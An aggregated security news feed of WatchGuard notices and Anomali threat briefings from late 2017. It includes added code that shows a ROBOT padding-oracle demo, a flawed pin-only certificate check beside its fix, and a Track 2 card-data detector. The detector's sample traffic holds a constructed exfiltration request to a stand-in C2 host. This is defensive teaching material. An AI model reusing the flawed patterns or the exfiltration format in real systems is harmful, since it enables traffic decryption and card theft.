Customer Support Access Changes

As a loyal WatchGuard customer, I’m sure that you’re aware that WatchGuard is growing!  To address your future needs, WatchGuard Customer Support is changing the way our technicians connect to your WatchGuard appliance while working on a support case.

New Option to Enable Support Access

Over the years, you have used a list of IP addresses in a WatchGuard policy to grant our technicians access to a Firebox or XTM appliance to troubleshoot issues. For added security, and to make granting WatchGuard Support access easier, we have added a Support Access feature to Fireware v12.0.1.

The Support Access option enables WatchGuard Support to connect to your Firebox with read-only permission. It adds a temporary user account with read-only permission and a temporary hidden policy that allows connections to the Firebox from WatchGuard Support. You can automatically generate credentials or specify a user name and password to provide to your WatchGuard support representative.

You can also define an expiration for the temporary Support Access account. Options for support access account expiration include:

  • None (no expiration)
  • 3 months
  • 1 month
  • 1 week
  • 1 day


New Connection IP Network Address

Appliances that run Fireware v12.0 or earlier will continue to use the WatchGuard policy configuration process, which involves adding specific IP addresses and ranges to the WatchGuard policy. WatchGuard Support is migrating to a new public subnet as part of an IT infrastructure change. For instructions on updating or setting up your WatchGuard policy configuration, please see knowledge base article #10426: Allow WatchGuard Support to connect to your Firebox.

As you migrate to Fireware v12.0.1 and higher software versions, please begin using the more secure and easy-to-use Support Access process to provide read-only access to your Firebox when working on support cases. For more detailed information on the Support Access feature, please see the online documentation.

Wishing all our loyal WatchGuard customers a wonderful holiday season.

Source: WatchGuard

Triton Malware Threatens Lives & The Net Neutrality Repeal – A History – Threat Wire

A history of ISP regulations, new malware is infecting industrial control systems, and three men plead guilty in the Mirai botnet case. All that coming up now on ThreatWire.


Source: Security news

Source: Zologic

Comprehensive Endpoint Protection Requires the Right Cyber Threat Intelligence

CTI falls into three main categories — tactical, operational, and strategic — and answers questions related to the “who, what, and why” of a cyber attack.
Source: Cyber Monitoring

WTB: New GnatSpy Mobile Malware Family Discovered

This section contains summaries of various threat intelligence stories from the past week. The intelligence in this week’s iteration discusses the following threats: ATM theft, data leaks, malspam, mobile malware, phishing, targeted attacks, threat groups, underground markets, and vulnerabilities. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

Trending Threats

Jack of All Trades (December 18, 2017)
A new mobile malware is targeting Android devices, according to Kaspersky Lab researchers. The malware, called “Loapi,” is being called a “jack of all trades” because of the numerous malicious capabilities that have been observed. Its modular architecture allows it to perform different malicious actions such as displaying advertisements, launching Distributed Denial-of-Service (DDoS) attacks, mining cryptocurrency, sending SMS messages, and subscribing the victim to paid services, among others. Researchers note that the modular architecture could allow the actors behind the malware to add new features at any time. The malware was observed impersonating antivirus and adult-related applications.

New GnatSpy Mobile Malware Family Discovered (December 18, 2017)
In early 2017, researchers discovered that a threat group, dubbed “Two-tailed Scorpion/APT-C-23,” was targeting Middle Eastern organizations with the “Vamp” and, later, “FrozenCell” malware. Now Trend Micro researchers have discovered a new mobile malware family, dubbed “GnatSpy,” that is believed to be a new variant of “Vamp.” As of this writing, researchers do not know how the threat group is distributing the malware to Android devices. It is possible that the actors sent the malware directly to those devices; researchers note the distribution method is in question because few Android applications were found to contain GnatSpy. The complexity of GnatSpy indicates that the group is increasing its malicious engineering efforts to steal information from Android devices.

Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks (December 15, 2017)
Microsoft has released an Office update that disables the Dynamic Data Exchange (DDE) protocol in Word applications as part of December’s Patch Tuesday. The DDE feature allows an Office application to load data from other applications. DDE has been used by threat actors to distribute malware, and this update is Microsoft’s attempt to help mitigate such malicious activity.

Ngay Campaign Rig EK Pushes Quant Loader & Monero CPU Miner (December 14, 2017)
Nao-sec researchers discovered a drive-by download campaign, dubbed “ngay,” that appears to target Vietnamese-speaking individuals. The actors behind this campaign previously used drive-by downloads to redirect website visitors to the “Disdain” Exploit Kit (EK). Researchers identified that this campaign is now using the “RIG” EK to distribute the “Quant” loader malware and a “Monero” cryptocurrency miner.

Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure (December 14, 2017)
While responding to a security incident, FireEye Mandiant researchers discovered that an unnamed company was infected with an attack framework called “TRITON.” The malware is designed to interact with Triconex Safety Instrumented System (SIS) controllers. Researchers state that TRITON is one of only a few publicly identified malware families that target Industrial Control Systems (ICS), in the same class as “Stuxnet” and “Industroyer.” The malware was found on a SIS workstation running Microsoft Windows, where it impersonated the legitimate Triconex Trilog application.

Apple Releases Security Updates (December 13, 2017)
The U.S. Computer Emergency Readiness Team (US-CERT) has issued an alert regarding vulnerabilities in multiple Apple products. The vulnerabilities could be exploited by a remote threat actor to alter application state on iOS and tvOS. Apple’s iCloud for Windows 7.2 is vulnerable to an actor in a privileged network position tracking a user on the same network.

WORK Cryptomix Ransomware Variant Released (December 13, 2017)
A new variant of the “Cryptomix” ransomware, dubbed “WORK” because the malware appends the .WORK extension to encrypted files, has been discovered in the wild, according to BleepingComputer researchers. This new variant uses the same encryption methods as previous Cryptomix versions; the changes are the .WORK extension appended to encrypted files and new email addresses to contact for the decryption key. While the distribution method of this ransomware has not been reported, malspam is a common method of distributing malware.

The ROBOT Attack (December 12, 2017)
A vulnerability first identified in 1998 by researcher Daniel Bleichenbacher, now dubbed “Return Of Bleichenbacher’s Oracle Threat” (ROBOT), has resurfaced, according to researchers Hanno Böck and Craig Young. Other researchers believe that this vulnerability is in fact the original “Padding Oracle Attack.” Daniel Bleichenbacher discovered that “the error messages given by SSL server for errors in the PKCS #1 1.5 padding allowed an adaptive-chosen ciphertext attack; this attack fully breaks the confidentiality of TLS when used with RSA encryption.” This vulnerability could allow a threat actor to record Internet traffic and later decrypt it against a vulnerable host that only supports RSA encryption. Researchers found that 27 of the top 100 domains, as ranked by Alexa, had vulnerable subdomains.
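To show what the oracle behind ROBOT looks like at the code level, here is an added example (not code from the original story or from the ROBOT researchers) that contrasts a PKCS #1 v1.5 unpadding routine whose failure modes are distinguishable with one shaped like the RFC 5246 countermeasure, where every malformed block is silently replaced by a random premaster secret. All inputs are constructed; `PREMASTER_LEN`, the modulus size `k` and the function names are this example’s own.

```python
import secrets

PREMASTER_LEN = 48   # a TLS RSA premaster secret is always 48 bytes

def pkcs1_v15_pad(message: bytes, k: int) -> bytes:
    """EME-PKCS1-v1_5 block: 0x00 0x02 | >= 8 nonzero random bytes | 0x00 | message."""
    if len(message) > k - 11:
        raise ValueError("message too long for modulus size")
    ps = bytes(secrets.choice(range(1, 256)) for _ in range(k - 3 - len(message)))
    return b"\x00\x02" + ps + b"\x00" + message

class PaddingError(Exception):
    pass

def leaky_unpad(em: bytes, k: int) -> bytes:
    """Checks written the naive way: each failure mode is reported differently,
    which is exactly the kind of oracle the ROBOT researchers measured."""
    if len(em) != k or em[0] != 0x00:
        raise PaddingError("bad first byte")
    if em[1] != 0x02:
        raise PaddingError("bad block type")
    sep = em.find(b"\x00", 2)
    if sep < 0:
        raise PaddingError("no separator")
    if sep < 10:
        raise PaddingError("padding string shorter than 8 bytes")
    if k - sep - 1 != PREMASTER_LEN:
        raise PaddingError("wrong premaster length")
    return em[sep + 1:]

def hardened_unpad(em: bytes, k: int) -> bytes:
    """Shape of the RFC 5246 section 7.4.7.1 countermeasure: no check aborts early and
    no failure is reported; a malformed block yields a random premaster, so the handshake
    later fails exactly as for a well-formed block with the wrong secret. (Python gives
    no constant-time guarantee; this shows the absence of a distinguishable error path.)"""
    fake = secrets.token_bytes(PREMASTER_LEN)
    bad = len(em) != k
    em = em.ljust(k, b"\x00")[:k]        # normalise so indexing never depends on input length
    bad |= em[0] != 0x00
    bad |= em[1] != 0x02
    sep = k                              # k means "no separator found"
    for i in range(2, k):                # full scan, no break on the first zero
        hit = em[i] == 0x00 and sep == k
        sep = i if hit else sep
    bad |= sep < 10
    bad |= (k - sep - 1) != PREMASTER_LEN
    start = (k - PREMASTER_LEN) if bad else sep + 1
    real = em[start:start + PREMASTER_LEN]
    return fake if bad else real

def classify(unpad, em: bytes, k: int) -> str:
    """What a peer can observe from a server using `unpad`: the error text or 'accepted'."""
    try:
        unpad(em, k)
        return "accepted"
    except PaddingError as e:
        return str(e)

def oracle_signatures(unpad, k: int = 128) -> set:
    """Feed constructed malformed blocks covering each failure mode and return the set
    of distinguishable responses. A single element means there is no padding oracle."""
    premaster = bytes(range(1, PREMASTER_LEN + 1))        # constructed; contains no 0x00
    good = pkcs1_v15_pad(premaster, k)
    variants = []
    for idx, val in [(0, 0x01), (1, 0x01), (5, 0x00), (20, 0x00), (k - PREMASTER_LEN - 1, 0x01)]:
        v = bytearray(good)
        v[idx] = val                     # the last case overwrites the separator itself
        variants.append(bytes(v))
    return {classify(unpad, v, k) for v in variants}
```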

Database of 1.4 Billion Credentials Found on Dark Web (December 11, 2017)
4iQ researchers have discovered a large, interactive database that contains an aggregated list of compromised credentials from approximately 252 previous breaches. The discovery was made on December 5, 2017. The advertised data consists of 1,400,533,869 usernames with associated clear-text passwords. The structure of the database makes it simple for anyone to download and interact with it, and the search feature is fast enough to return a result in one second. After additional analysis of the data, researchers found that the number of compromised credentials is lower because not all of the usernames are listed with an associated password. While some sources state that the data was located on underground forums, and this is likely, the data was also found in open locations such as “Reddit.”

Hacker’s Delight: Mobile Bank App Security Flaw Could Have Smacked Millions (December 11, 2017)
University of Birmingham researchers have published information regarding vulnerabilities in popular banking applications. The researchers used a custom tool called “Spinner” to conduct semi-automated security tests on 400 security-sensitive applications. Through this testing, they found that many banking applications use a technique called “Certificate Pinning” to improve connection security, but that this technique made it harder for penetration testers to find a more serious vulnerability. The vulnerability found in many popular banking applications was that they did not properly verify the hostname. This flaw could have allowed a threat actor on the same network as a user of an affected application to conduct Man-in-The-Middle (MiTM) attacks to steal user credentials.
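As an added example (not the Birmingham team’s Spinner tool or any bank’s code), the following models the flaw: a client that only checks the certificate chain against a pinned CA key accepts any certificate that CA issued, whereas the corrected check also matches the leaf certificate’s DNS names against the requested host. The matcher goes beyond the story to apply the RFC 6125 wildcard rules; the certificates and SPKI bytes are constructed placeholders, not real keys.

```python
import base64
import hashlib

def spki_pin(spki_der: bytes) -> str:
    """HPKP-style pin: base64(SHA-256(SubjectPublicKeyInfo DER)). The DER here is a
    constructed placeholder byte string, not a real key."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode()

# Constructed stand-ins for X.509 certificates. Both leaf certificates chain to the
# same CA, which is all a pin-only check can see.
CA_SPKI = b"constructed-public-ca-spki"
PINS = {spki_pin(CA_SPKI)}
BANK_CERT = {"issuer_spki": CA_SPKI, "san_dns": ["*.bank.example", "bank.example"]}
OTHER_CERT = {"issuer_spki": CA_SPKI, "san_dns": ["www.unrelated.example"]}

def dns_name_matches(pattern: str, hostname: str) -> bool:
    """RFC 6125 style comparison: case-insensitive, a wildcard only as the entire
    leftmost label, never spanning a dot, and never for a two-label pattern like '*.com'."""
    p_labels = pattern.lower().rstrip(".").split(".")
    h_labels = hostname.lower().rstrip(".").split(".")
    if len(p_labels) != len(h_labels) or len(p_labels) < 2:
        return False
    if p_labels[0] == "*":
        return len(p_labels) >= 3 and p_labels[1:] == h_labels[1:]
    return p_labels == h_labels          # partial wildcards such as 'f*.example' are rejected

def verify_pin_only(cert: dict, pins: set) -> bool:
    """The flawed pattern: trust the chain because it ends in a pinned key, and never
    ask whom the leaf certificate was issued to."""
    return spki_pin(cert["issuer_spki"]) in pins

def verify_pin_and_hostname(cert: dict, pins: set, hostname: str) -> bool:
    """Corrected: the pin narrows the trusted issuers, the SAN check binds the
    certificate to the host the app actually connected to."""
    return verify_pin_only(cert, pins) and any(
        dns_name_matches(name, hostname) for name in cert["san_dns"])

def handshake_decisions(hostname: str) -> dict:
    """Outcome of each policy for the genuine and the unrelated certificate."""
    return {
        "pin_only": [verify_pin_only(c, PINS) for c in (BANK_CERT, OTHER_CERT)],
        "pin_and_hostname": [verify_pin_and_hostname(c, PINS, hostname)
                             for c in (BANK_CERT, OTHER_CERT)],
    }
```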

Phishing Attacks on Bitcoin Wallets Intensify as Price Goes Higher and Higher (December 11, 2017)
With the significant increase in the monetary value of Bitcoin, approximately $16,180 USD per bitcoin as of this writing, threat actors are increasingly targeting Bitcoin-related websites and Bitcoin users. In addition to phishing emails, “CheckPhish” researchers also identified five phishing domains targeting the “Blockchain” wallet service. Other security researchers found that the brand of the Bitcoin exchange “LocalBitcoins” was also used on phishing websites. Threat actors are attempting to steal wallet files and empty accounts of their bitcoins.

Hackers Hit U.S., Russian Banks In ATM Robbery Scam: Report (December 11, 2017)
A previously unknown, Russian-speaking threat group, dubbed “MoneyTaker,” is responsible for the theft of approximately $10 million USD from around 18 banks, according to Group-IB researchers. The actors targeted ATMs operated by banks primarily located in the U.S. and Russia. The malicious activity is ongoing and is believed to have begun approximately 18 months ago. Researchers identified that the first attacks took place in the spring of 2016 against banks using the “STAR” network of the payment technology company “First Data”; STAR is a debit card processing and payment network. First Data has stated that “a number” of financial institutions on the STAR network had their credentials for administering debit cards compromised. The actors used custom malware called MoneyTaker, also used as the name of the group, to manipulate payment orders and then used “money mules” to cash out funds from ATMs.

Observed Threats

This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section.

Locky Tool Tip
Locky is ransomware that is widely spread via phishing messages. Locky first appeared in early 2016 and is strongly correlated with the cyber criminal groups behind the Dridex and Necurs botnets. Multiple waves of Locky samples are distributed daily. The delivery mechanism has evolved over time: spam messages with executable attachments, MS Word document attachments using macros to retrieve and then execute Locky, and Zip files that extract JavaScript loaders that retrieve and then execute Locky. Hosts compromised by Locky display a ransom note with instructions on how to decrypt the encrypted files. Encrypted files are renamed with the .locky or .zepto extension.
Tags: Locky, Ransomware

Source: Honeypot Tech

Fireware 12.1 Now Available

We are pleased to announce the new release of Fireware 12.1 and WSM 12.1! These significant new releases are now available for download from the software download center. The highlight of Fireware 12.1 is the Access Portal, a clientless application portal that is available for SSO integration with cloud assets and with internal resources via RDP and SSH. With the rate and notoriety of recent cybersecurity incidents involving compromised personal information, the marketplace for web-based authentication solutions continues to grow at a Compound Annual Growth Rate upwards of 10%. The Access Portal is uniquely positioned to integrate into existing authentication markets to provide a clientless experience while encouraging strong authentication with existing SSO vendors, or even providing MFA access (e.g., Google Authenticator) to the portal itself.

The release of Fireware 12.1 adds a bevy of networking, VPN and proxy improvements that allow the network administrator to focus on the network without compromising security:

  • BoVPN over TLS provides an alternative to IPSec for site-to-site VPNs
  • Mobile VPN with IKEv2 enables support for native VPN clients on mobile operating systems, including Mac, Windows, iOS, and Android
  • USB modem interfaces now support physical-interface features such as Multi-WAN and traffic management
  • New IMAPS proxy, HTTPS domain software exclusion list, and WebBlocker UI improvements
  • Gateway Wireless Controller gains band steering capability and additional passphrase protections


Does this release pertain to me?

The Fireware release applies to all Firebox T, Firebox M, and XTM appliances, except the XTM 21/21-W, 22/22-W, 23/23-W, 505, 510, 520, and 530, which have reached End of Life.

Software Download Center

Firebox and XTM appliance owners with active support subscriptions can obtain this update without additional charge by downloading the applicable packages from the WatchGuard Software Download Center.


For Sales or Support questions, you can find phone numbers for your region online. If you contact WatchGuard Technical Support, please have your registered appliance Serial Number or Partner ID available.



Source: WatchGuard

Advanced Deception: How It Works & Why Attackers Hate It

While cyberattacks continue to grow, deception-based technology is providing accurate and scalable detection and response to in-network threats.
Source: Vulnerabilities & Threats

Hak5 2314 – Hacking PIN Codes with a 3D Printer

In this very serious episode of Hak5, we learn how to hack PIN codes with a 3D printer by editing code for the 3D printer axis!

Special thanks to David Randolph for joining us on this episode!


Source: Security news

Source: Zologic

[Strategic Security Report] Navigating the Threat Intelligence Maze

Most enterprises are using threat intel services, but many are still figuring out how to use the data they’re collecting. In this Dark Reading survey we give you a look at what they’re doing today – and where they hope to go.
Source: Cyber Monitoring

TekThing 155 – Tech Gifts for Travelers! Amazon Cloud Cam Review, Test Your Home Network Speed!

Tech Gifts for Travelers! Amazon Cloud Cam Review, Test Your Home Network Speed, $10,000 Surge Protector Save!
03:26 Amazon Cloud Cam
When Canary Security Cameras dropped several of the features that came in the free plan, and paywalled the built-in mic for two-way talk, Shannon started the search for an alternative security cam. How does Amazon’s Cloud Cam stack up vs. Canary, Arlo, and Nest? Watch the video for the review! (If you want to know what deauth attacks are, read this.)

14:50 Network Performance Testing
How fast is your router? How slow is the WiFi in that corner of the house? John tweeted out, “in episode 146 you talked about network speed tests (not internet). What software do you use for this?” We talk about iPerf, which has clients for just about everything, and an easy-to-run Windows version, Network Performance Test, in the video!

19:36 Patreon Not Changing Fees
“We messed up. We’re sorry, and we’re not rolling out the fees change.” Good to hear, but we’ve got a hack so you can create a monthly payment, ideas for alternatives, and our thanks for your support during this mess in the show.

22:03 Tech Gifts For Frequent Travelers!!!
After her last trip to Japan, Shannon’s got a fresh group of tech gifts for world travelers (and US travelers, for that matter!). What’s going on the list alongside the HooToo Wireless Router and Anker 5-port USB wall charger? A 20100 mAh battery pack, a USB-C pick, too, and here are the FAA regulations on batteries, noise-cancelling headphones (Bose and 1More have great options), a mini digital scale from TipTiper, a VPN service (we use PIA), Peak Design’s Everyday Backpack, and more, in the video!

30:11 Surge Protectors Saved Mark’s Tech
The TV in the bedroom was literally smoking… all the other TVs and the computers in Mark’s house were safe. Find out what happened, and why you really should be running surge protectors on your gear in the video!

33:13 Do Something Analog
Like Ken, who sent us a great photo from his tech break at Myrtle Beach!
Thank You Patrons! Without your support, we wouldn’t be able to make the show for you every week!

Source: Security news

Source: Zologic

A Very Malicious Christmas

In 2017, Americans are projected to spend $906 million on gifts, up from $785 million in 2016. A significant chunk of that total will be spent online. As consumers turn to the internet, those looking to exploit them are increasing at a similar rate.

Over the last 5 years, the festive season has seen actors ramping up Christmas themed campaigns to directly target businesses and consumers. This post outlines a very small number of particularly prolific attacks that have been observed over previous Christmases that will very likely be seen in reworked variants this year.

FastPOS

View details in ThreatStream: search for *fastpos.*

Despite the increase in ecommerce transactions, in-person retail sales still account for the largest share of the market. Many consumers don’t think twice when they swipe their credit card or enter their PIN when buying that must-have gift. Unfortunately, some of these people might receive unwelcome expenses on their credit card statements come January if they’ve fallen victim to using a point-of-sale (POS) device infected with malware.

First seen in June 2016, FastPOS is just one of many malware families that target POS devices. Like other POS families, it captures credit card data (Track 2) and logs keystrokes on the infected machine. Notably, the malware communicates with its command and control (C&C) server over an unencrypted HTTP session. It establishes persistence much like other malware, by creating an autorun key in the Windows registry.
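Because FastPOS sends the captured Track 2 data over plain HTTP, a defender can look for it on the wire. The following added example (not FastPOS code or any vendor’s detection logic) parses constructed plaintext HTTP POST requests and flags bodies that contain Track 2 strings whose PAN passes the Luhn check, which filters out random digit runs; the hosts, paths and request bodies are all constructed.

```python
import re

# Track 2 as encoded on a magstripe: ';' start sentinel, 13-19 digit PAN, '=' separator,
# YYMM expiry, 3-digit service code, discretionary data, '?' end sentinel.
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\?")

def luhn_ok(pan: str) -> bool:
    """Mod-10 check digit test; rejects digit runs that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def find_track2(text: str) -> list:
    """Return masked card details for every well-formed Track 2 string in `text`."""
    hits = []
    for m in TRACK2_RE.finditer(text):
        pan, yy, mm, service = m.group(1, 2, 3, 4)
        if luhn_ok(pan) and 1 <= int(mm) <= 12:
            hits.append({"pan_masked": pan[:6] + "*" * (len(pan) - 10) + pan[-4:],
                         "expiry": f"20{yy}-{mm}", "service_code": service})
    return hits

def scan_request(raw: bytes):
    """Parse one plaintext HTTP request; return an alert dict if its body carries
    Track 2 data, else None. Only the request line and Host header are needed."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cards = find_track2(body.decode("latin-1"))
    if not cards:
        return None
    return {"host": headers.get("host", "?"), "method": method, "path": path, "cards": cards}

def scan_capture(requests: list) -> list:
    """Run the detector over a list of raw requests and keep only the alerts."""
    return [a for a in (scan_request(r) for r in requests) if a]

# Constructed sample traffic. 4111111111111111 is a standard Luhn-valid test number;
# the second request carries a digit run that fails Luhn and must not alert.
SAMPLE_REQUESTS = [
    b"POST /gate.php HTTP/1.1\r\nHost: c2.constructed.test\r\nContent-Type: text/plain\r\n\r\n"
    b"dump=;4111111111111111=2512101123456789?&ks=qwerty",
    b"POST /api/ping HTTP/1.1\r\nHost: updates.constructed.test\r\n\r\n"
    b"id=;4111111111111112=2512101000?",
]
```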

Previously, FastPOS has taken advantage of the increased retail transaction volume in the run-up to Christmas. Various iterations of the FastPOS and other malware families targeting POS systems are likely to follow suit during the 2017 holiday season.

Protip for retailers: search for indicators of compromise (IOCs) tagged with “retail” in ThreatStream to uncover threats to your operations over Christmas.

Lizard Squad

View details in ThreatStream: search for *lizard%20squad.*

In 2014, Lizard Squad performed a distributed denial-of-service (DDoS) attack against the Xbox Live and Sony PlayStation networks over Christmas. As millions (including myself) attempted to play the games they’d just received as gifts, they were met with errors for the duration of the attack.

Looking through ThreatStream, Lizard Squad is responsible for a number of attacks, with DDoS being their preferred method. Since the group’s inception they have developed increasingly sophisticated DDoS capabilities and are now using variants of the botnet malware GafGyt.

Protip for gaming companies: sync indicators of compromise (IOCs) from ThreatStream with your SIEM to automatically match known threats to your logs, and alert when a match has been found.

Merry X-Mas

View details in ThreatStream: search for *Merry%20Christmas%20Ransomware.*

2017 has been the year of ransomware. From WannaCry to Petya and everything in between, ransomware has wreaked havoc on companies around the world. The NotPetya ransomware will reportedly cost shipping giant Maersk $300 million alone!

The Merry Christmas (or Merry X-Mas) ransomware was spotted for the first time by security researchers in early January 2017, when the malware was distributed through spam campaigns. According to researchers, the latest strains of the ransomware have been delivered together with other pieces of malware, namely DiamondFox, which is used to steal sensitive information from victims’ systems.

Protip for SecOps teams: be alerted immediately when the latest malware hashes or suspect domains produced by domain generation algorithms (DGAs) are seen inside your network (including on mobile devices) using Anomali Enterprise.

Phishing for gifts

View search in ThreatStream: search for *christmas.*

A quick search for malicious domains in ThreatStream turns up hundreds of IOCs with the word “christmas.” Phishing campaigns often ramp up over the festive period, taking advantage of the fact people are spending more money in December. I’ve seen campaigns spoofing retailers and financial institutions in greater number this year than in any previous year I can recall.

Protip for everyone: never click a link in an email. For SecOps teams, monitor emails from compromised addresses or with links to known malicious domains before they’re clicked using Anomali Enterprise.

A few free Christmas gifts from Anomali

STAXX gives you an easy way to access any STIX/TAXII feed and is a great tool for those starting to incorporate threat intelligence into their security strategies.

You can download STAXX for free here — our gift to you this Christmas.

Understand your security risk posture with a free customized Recon Report from Anomali Labs. Simply sign up for a free Anomali Enterprise Trial in the month of December.

A December to Remember

Source: Honeypot Tech